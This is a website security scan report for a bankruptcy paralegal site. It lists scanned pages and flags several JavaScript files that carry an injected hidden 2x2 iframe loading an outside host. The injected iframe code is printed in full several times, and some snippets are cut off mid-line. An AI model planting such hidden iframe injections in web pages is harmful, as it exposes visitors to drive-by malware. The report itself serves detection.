Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ebankruptcyparalegal.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.ebankruptcyparalegal.com/ | 200 OK Content-Length: 7438 Content-Type: text/html | clean |
http://www.ebankruptcyparalegal.com/header.js | 200 OK Content-Length: 2429 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- Begin HEADER OPTIONS CODE var color = "819AC0" var flashwidth = "600" var flashheight = "50" var logotype = "flash" var flashmode = "transparent" var spaceunder = "10" var phonenum = "201-702-1377" var headlink = "contact.htm" var linktext = "CONTACT US" document.write('<table cellpadding="0" cellspacing="0" border="0" width="100%"><tr><td align="left" valign="middle">'); if (logotype == "flash") { document.write('<object document.write('<img src="picts/spacer.gif" border="0" width="200" height="1"><br>'); document.write('</td></tr></table>'); document.write('<img src="picts/spacer.gif" border="0" width="10" height="'+spaceunder+'"><br>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://mntracing.com/showthread.php?sid=279566></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://mntracing.com/showthread.php?sid=279566 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://mntracing.com/showthread.php?sid=279566> | ||
http://www.ebankruptcyparalegal.com/menu.js | 200 OK Content-Length: 1560 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- Begin var menuside ="left" document.write('<table cellpadding="0" cellspacing="0" border="0" class="menu-table"><tr><td align="'+menuside+'">'); document.write('<table cellpadding="0" cellspacing="0" border="0"><tr><td align="center">'); document.write('<a href="index.html" class="menu firstmenu">Home</a>'); document.write('</td><td align="center">'); document.write('<a href="about.htm" class="menu"& document.write('<a href="contact.htm" class="menu">Contact</a>'); document.write('</td><td align="center">'); document.write('</td></tr></table>'); document.write('</td></tr></table>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://mntracing.com/showthread.php?sid=279566></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://mntracing.com/showthread.php?sid=279566 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://mntracing.com/showthread.php?sid=279566> | ||
http://www.ebankruptcyparalegal.com/social-links.js | 200 OK Content-Length: 1170 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- Begin var social = "yes" if (social == "yes") { document.write('<br>'); document.write('Connect with us on:<br>'); document.write('<table cellpadding="4" cellspacing="0" border="0"><tr><td>'); document.write('<a href="http://twitter.com/ebankruptcy"><img src="picts/social_twitter.gif" border="0" alt="Twitter"></a><br>'); document.write('</td><td>'); document.write('<a href="http://www.f document.write('<a href="http://www.linkedin.com/pub/ebankruptcy-paralegal-llc/49/615/625"><img src="picts/social_linkedin.gif" border="0" alt="LinkedIn"></a><br>'); document.write('</td></tr></table>'); document.write('<hr class="page-splits">'); } document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://mntracing.com/showthread.php?sid=279566></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://mntracing.com/showthread.php?sid=279566 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://mntracing.com/showthread.php?sid=279566> | ||
http://www.ebankruptcyparalegal.com/copyright.js | 200 OK Content-Length: 529 Content-Type: application/javascript | suspicious |
Hidden iFrame found. size: 2x2 src: http://mntracing.com/showthread.php?sid=279566 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://mntracing.com/showthread.php?sid=279566> | ||
http://www.ebankruptcyparalegal.com/services.htm | 200 OK Content-Length: 7558 Content-Type: text/html | clean |
http://www.ebankruptcyparalegal.com/CLIENT-INTAKE-FORM.pdf | 200 OK Content-Length: 302317 Content-Type: application/pdf | clean |
http://www.ebankruptcyparalegal.com/test404page.js | 404 Not Found Content-Length: 2693 Content-Type: text/html | clean |
http://www.ebankruptcyparalegal.com/client-intake-form-spanish.pdf | 200 OK Content-Length: 300869 Content-Type: application/pdf | clean |
http://www.ebankruptcyparalegal.com/Benefits.htm | 404 Not Found Content-Length: 2693 Content-Type: text/html | clean |
http://www.ebankruptcyparalegal.com/contact.htm | 200 OK Content-Length: 4519 Content-Type: text/html | clean |
http://www.ebankruptcyparalegal.com/contact.js | 200 OK Content-Length: 798 Content-Type: application/javascript | suspicious |
Hidden iFrame found. size: 2x2 src: http://mntracing.com/showthread.php?sid=279566 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://mntracing.com/showthread.php?sid=279566> |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ebankruptcyparalegal.com
Result:
GET / HTTP/1.1
Host: ebankruptcyparalegal.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: ebankruptcyparalegal.com
Referer: http://www.google.com/search?q=ebankruptcyparalegal.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: ebankruptcyparalegal.com
Referer: http://www.google.com/search?q=ebankruptcyparalegal.com
Result:
The result is similar to the first query. There are no suspicious redirects found.